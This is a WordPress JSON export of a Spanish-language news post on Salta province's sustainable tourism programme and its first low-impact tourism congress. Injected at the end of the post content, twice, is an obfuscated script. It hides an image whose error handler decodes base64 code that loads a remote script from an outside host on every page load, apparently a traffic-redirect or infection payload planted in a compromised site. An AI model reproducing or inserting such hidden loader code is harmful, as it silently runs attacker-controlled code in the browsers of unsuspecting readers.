{"id":2949,"date":"2023-08-04T10:45:55","date_gmt":"2023-08-04T13:45:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2949"},"modified":"2025-08-14T00:11:12","modified_gmt":"2025-08-14T03:11:12","slug":"avanza-el-desarrollo-del-programa-provincial-para-una-actividad-turistica-sostenible","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2949","title":{"rendered":"Avanza el desarrollo del programa provincial para una actividad tur\u00edstica sostenible"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#8a0325\"><em>Los avances del programa, en un trabajo intersectorial, fueron expuestos en el marco del 1\u00b0Congreso de Turismo de Bajo Impacto que hasta ma\u00f1ana 4 de agosto se llevar\u00e1 a cabo en la Usina Cultural.<\/em><\/h4>\n\n\n\n<p>Salta lidera el camino hacia un destino sostenible con un innovador programa integral, pionero en el pa\u00eds, din\u00e1mico y de construcci\u00f3n colectiva, que se desarrolla en l\u00ednea con el plan Liderar y con una tendencia tur\u00edstica que cada vez tiene m\u00e1s fuerza en el mundo. Surge de un compromiso del sector p\u00fablico intersectorial y con el protagonismo de emprendedores.<\/p>\n\n\n\n<p>En este marco, en la ciudad de Salta inici\u00f3 el 1\u00b0 Congreso de Turismo de Bajo Impacto bajo el lema \u201cSostenibilidad en Acci\u00f3n\u201d con la presencia de expositores destacados de nivel nacional e internacional que abordaran distintas dimensiones del sector tur\u00edstico. Las jornadas est\u00e1n apuntaladas en cuatro dimensiones: Ambiental del Turismo, Social, Econ\u00f3mica y Tecnol\u00f3gica.<\/p>\n\n\n\n<p>La secretaria de Turismo&nbsp;<strong>Nadia Loza<\/strong>&nbsp;en representaci\u00f3n del Gobierno expuso sobre el programa Salta Hacia un Destino Sostenible que ubica a la provincia a la vanguardia en esta tendencia tur\u00edstica. La funcionaria contextualiz\u00f3 estos avances en el plan Liderar que encuadra varias acciones, entre las que se destaca \u201ceste programa que responde a qu\u00e9 queremos ser como destino tur\u00edstico\u201d, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Afirm\u00f3 que Salta es la primera provincia que inicia este trabajo de ser \u201cun destino sostenible en lo ambiental, social y econ\u00f3mico\u201d, agregando a esta visi\u00f3n \u201clas dimensiones tecnol\u00f3gicas y la institucional. La regla para cada uno de los actores del turismo, es que la sostenibilidad no es un nicho, sino que se debe demostrar que se trabaja seriamente con este concepto\u201d.<\/p>\n\n\n\n<p>Tambi\u00e9n se refiri\u00f3 a lo que demanda el turista cada vez m\u00e1s de los destinos, en materia de entornos naturales, gastronom\u00eda con alimentos de cercan\u00eda y con comunidades protegidas que alcancen desarrollo.<\/p>\n\n\n\n<p>Adem\u00e1s, describi\u00f3 los 26 proyectos que est\u00e1n incluidos en el Plan de Sostenibilidad, donde se destaca el desarrollo de una Plataforma Colaborativa, que por un lado visibilizar\u00e1 a todos los actores de la cadena de valor tur\u00edstica que llevan adelante pr\u00e1cticas sostenibles, para que el turista de una forma pr\u00e1ctica y transparente, tenga informaci\u00f3n de ofertas sostenibles disponibles en los 60 municipios.<\/p>\n\n\n\n<p>Por otra parte, contar\u00e1 con una calculadora que permitir\u00e1 al turista cuantificar la huella que genera al visitar el destino. \u201cNo s\u00f3lo podr\u00e1 medir la huella de carbono, sino que tambi\u00e9n se calcular\u00e1 la huella de desarrollo local, con un sistema que a su vez brindar\u00e1 al turista la posibilidad de compensar el impacto con acciones como comprar un \u00e1rbol o realizar una donaci\u00f3n para planes comunitarios\u201d, ejemplific\u00f3 Loza.<\/p>\n\n\n\n<p>\u00abSalta se convertir\u00e1 en el primer destino de Sudam\u00e9rica en contar con esta innovadora herramienta que permite calcular la huella del turista, en t\u00e9rminos no s\u00f3lo ambientales sino socioculturales\u00bb destac\u00f3 la funcionaria.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/avanza-el-desarrollo-del-programa-provincial-para-una-actividad-turistica-sostenible-91016\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n\n\n\n<p><strong><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los avances del programa, en un trabajo intersectorial, fueron expuestos en el marco del 1\u00b0Congreso de Turismo de Bajo Impacto que hasta ma\u00f1ana 4 de agosto se llevar\u00e1 a cabo en la Usina Cultural. Salta lidera el camino hacia un destino sostenible con un innovador programa integral, pionero en el pa\u00eds, din\u00e1mico y de construcci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2950,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-2949","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-temas-relacionados"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2949"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2949"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2949\/revisions"}],"predecessor-version":[{"id":7003,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2949\/revisions\/7003"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2950"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2949"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2949"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2949"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}